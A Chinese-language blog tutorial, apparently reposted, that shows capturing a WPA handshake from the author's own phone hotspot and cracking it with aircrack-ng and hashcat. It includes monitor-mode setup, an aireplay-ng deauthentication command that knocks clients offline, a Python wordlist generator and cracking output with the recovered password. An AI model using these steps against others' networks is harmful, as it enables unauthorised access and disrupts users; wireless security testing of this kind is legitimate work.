kali-进行抓包以及aircrack-ng跑包和hashcat跑包

这篇具有很好参考价值的文章主要介绍了kali-进行抓包以及aircrack-ng跑包和hashcat跑包。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


环境:

VMware® Workstation 16 Pro

kali-linux-2023.1 64位

python3.9.13

RT3070-USB无线网卡

一、连接无线网卡

1.首先按下win+r打开运行窗口

2.输入services.msc,然后按回车键即可进入服务

3.找到VMware USB Arbitration Service 右击启动

4.右键虚拟机,设置,在USB控制器中,勾选USB兼容性2.0以及显示所有USB输入设备

5.打开kali,上方的虚拟机→可移动设备→自己的网卡型号

6.输入命令ifconfig查看,出现wlan0即为安装成功

在线跑抓取包,玩转Kali,网络

6.使用airmon-ng命令检查网卡是否支持监听模式,如果该命令没有任何输出则表示没有可以支持监听模式的网卡。

在线跑抓取包,玩转Kali,网络

二、抓取TCP握手包

1.开启无线网卡的监听模式

airmon-ng start wlan0

2.开启监听模式之后,无线接口wlan0变成了wlan0mon,可以使用ifconfig命令查看 ,如下图所示

注意啊:没有变为wlan0mon的也不是说网卡不支持监听,没有变wlan0mon就直接airodump-ng wlan0):

3.扫描环境中的WiFi网络

airodump-ng wlan0mon

其中,OnePlus Ace 2 Pro 为我的手机热点
在线跑抓取包,玩转Kali,网络

4.抓取握手包

当有新用户连接WiFi时会发送握手包,使用网卡的监听模式抓取包含了WiFi密码的握手包。

抓包:

airodump-ng -c 6 --bssid 5A:10:53:1A:B7:BD  -w hack wlan0mon

-c 指定信道,上面已经标记目标热点的信道

-bssid指定目标路由器的BSSID,就是上面标记的BSSID

-w指定抓取的数据包保存的目录

handshake即为握手包
在线跑抓取包,玩转Kali,网络

三、aircrack-ng跑包和hashcat跑包

使用python生成字典,也可以进行下载

import itertools
import time

//8位数字字典大约950M
charset = "1234567890"
min_length = 8
max_length = 8
total_passwords = sum(len(charset) ** length for length in range(min_length, max_length + 1))
filename = "wifi_passwords.txt"

# 生成进度信息
def print_progress(length, current, total):
    print(f"{current}/{total}", end="\n", flush=True)

# 生成密码
def generate_passwords(length):
    for p in itertools.product(charset, repeat=length):
        yield ''.join(p)

# 打开文件并写入密码组合
with open(filename, "w") as file:
    for length in range(min_length, max_length + 1):
        print(f"0/{total_passwords}", end="\n", flush=True)

        for i, password in enumerate(generate_passwords(length)):
            file.write(password + "\n")
            time.sleep(0.0001)
            print_progress(length, i+1, total_passwords)

    print(f"生成完成")

1.aircrack

aircrack-ng -a2 -b 5A:10:53:1A:B7:BD -w wifipwd.txt hack-02.cap
  • a2:WPA模式
  • b :破解的WIFI的BSSID
  • w :指定字典文件
  • wifipwd.txt:密码字典的文件路径。

在线跑抓取包,玩转Kali,网络

KEY FOUND![jns20231217]

2.Hashcat

通过将 .cap 文件上传到https://hashcat.net/cap2hashcat并将其转换为 .hc22000 格式

hashcat -m 22000 hack-02.hc22000 wifipwd.txt 
  • -m 22000:指定使用hc22000模式。
  • hack-02.cap:握手包的文件路径。
  • wifipwd.txt:密码字典的文件路径。

在线跑抓取包,玩转Kali,网络

6ce383df82ebcc12c278729fd5a8d6ec:5a10531ab7bd:c0f4e66b2067:OnePlus Ace 2 Pro:jns20231217
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: hack-02.hc22000
Time.Started.....: Sun Dec 17 19:42:22 2023 (7 secs)
Time.Estimated...: Sun Dec 17 19:42:29 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (wifipwd.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    22604 H/s (10.14ms) @ Accel:128 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 145408/390626 (37.22%)
Rejected.........: 0/145408 (0.00%)
Restore.Point....: 144384/390626 (36.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: jns20221120 -> jns20237223
Hardware.Mon.#1..: Util: 74%

Started: Sun Dec 17 19:41:54 2023
Stopped: Sun Dec 17 19:42:29 2023

四、其他

关闭监听模式,在监听模式下,kali不能连接网络

airmon-ng stop wlan0mon

解除网卡占用

airmon-ng check kill

开启无线网卡的监听模式,有包但没有握手包,需要强制踢下线:

aireplay-ng -0 2 -a D6:37:56:03:9E:EF -c C0:F4:E6:6B:20:67 wlan0mon

在线跑抓取包,玩转Kali,网络

  • -0 后的2是次数,BSSID和STATION都能从上图中获取。

踢下线后获取握手包
在线跑抓取包,玩转Kali,网络文章来源地址https://www.toymoban.com/news/detail-793233.html

到了这里,关于kali-进行抓包以及aircrack-ng跑包和hashcat跑包的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 使用数据抓包和篡改技术对iOS小游戏进行实践:服务器

    引言: 数据抓包和篡改是一种常用的技术手段,用于分析和修改移动应用程序与服务器之间的通信数据。在iOS小游戏开发中,了解和掌握这些技术可以帮助开发人员测试和调试游戏,并实现一些有趣的功能。本文将介绍如何使用数据抓包和篡改技术对iOS小游戏进行实践,以及

    2024年04月09日
    浏览(69)
  • kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)

    平台及工具: linux:kali平台 aircrack - ng 工具 免驱监听网卡 详细操作 1.首先启动kali,插入网卡,输入ifconfig查看kali是否检测到监听网卡,注意监听网卡要免驱动的。  如图,看到wlan0就代表kali成功检测到监听网卡啦。 2.在启动网卡的监听模式之前一定要杀死进程,否则将会监

    2024年02月16日
    浏览(36)
  • tcpdump 抓包和记录、tshark 过滤抓包

    目录 tcpdump 一、包名 二、可用参数 tcpdump -nn    tcpdump -nn -i  网卡名   —— 指定显示的网卡 tcpdump -nn  -i  网卡名  port   端口名    ——  指定显示的端口  tcpdump -nn  -i  网卡名  not  port   端口名   ——  排除指定的端口不显示 tcpdump -nn  -i  网卡名  port   端口名

    2024年02月09日
    浏览(41)
  • TCP抓包和数据包分析

    tcpdump是Linux系统下的一款抓包命令集,工作原理是基于网卡抓取流动在网卡上的数据包。在Linux系统中由于tcpdump命令的简单和强大,我们一般直接使用tcpdump命令来抓取数据包。保存之后,拖下来在wireshark中分析 一、TCP数据包抓取 tcpdump常用参数: -c:表示要抓取的包数量,比

    2024年02月13日
    浏览(31)
  • fiddler电脑抓包和HttpCanary(小黄鸟)手机抓包教程

    **1.安装CA证书,依次点击ToolsOptionsHTTPSActions,按下图所示证书会被导出到桌面,在桌面去安装即可。 *2.抓取https协议请求,在路径ToolsOptionsHTTPS中勾选解密https协议在如下图所示。 关于安卓手机抓包,从安卓6.0以后不能直接抓取https协议的请求了,这里有三种抓包方案。 第一种

    2024年02月16日
    浏览(59)
  • EVE-NG模拟器安装&抓包模块部署

    EVE-NG(Emulated Virtual Environment-Next Generation)仿真虚拟环境,是基于Ubuntu Linux系统的虚拟环境,是一款免费且功能强大的网络模拟器,是一个无客户端的多厂商网络仿真软件,无需安装各厂商的网络模拟器,如思科的Cisco Packet Tracer、华为的ensp、华三的HCL等等,很适合用于网络仿真

    2024年02月12日
    浏览(168)
  • Wireshark 的抓包和分析,看这篇就够了!

    WireShark是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。在网络封包和流量分析领域有着十分强大功能的工具,深受各类网络工程师和网络分析师的喜爱

    2024年02月08日
    浏览(49)
  • 怎么通过Fiddler对APP进行抓包?以及高级应用场景分析

    目录 前言 简单说下Fiddler的抓包原理: 使用fiddler代理远程捕获APP请求 Fiddler高级应用场景介绍 1、url地址重写  fiddler抓包详细教程:全网抓包天花板教程,B站讲的最详细的Fiddler/Charles抓包教学视频。2小时包你学会_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1tv4y1575S/?spm_id_from

    2024年02月08日
    浏览(58)
  • Burp Suite代理抓包和浏览器代理设置

    本文解决使用Burp Suite代理时出现的一些问题,比如出现代理服务器异常、建立安全连接失败等等。 安全连接失败 a.在使用代理的时候经常出现下图所示的问题: 这时可能是burp suite证书的问题。 b.从burp suite导出证书 这个证书我之前下载了,也可以从网页下载http://burp 或者

    2024年02月14日
    浏览(47)
  • Kali Linux中BurpSuite工具抓包详解

    上一个教程我给大家带来了Kali Linux中BurpSuite工具爆破密码详解:Kali Linux中BurpSuite工具爆破密码详解_SXFourstar.布袋的博客-CSDN博客 而在本次教程中,我会详细保姆级教大家如何在kali Linux操作系统上使用自带工具BurpSuite进行抓包, 个人比较推荐在Kali Linux系统的BurpSuite工具进行

    2024年04月26日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包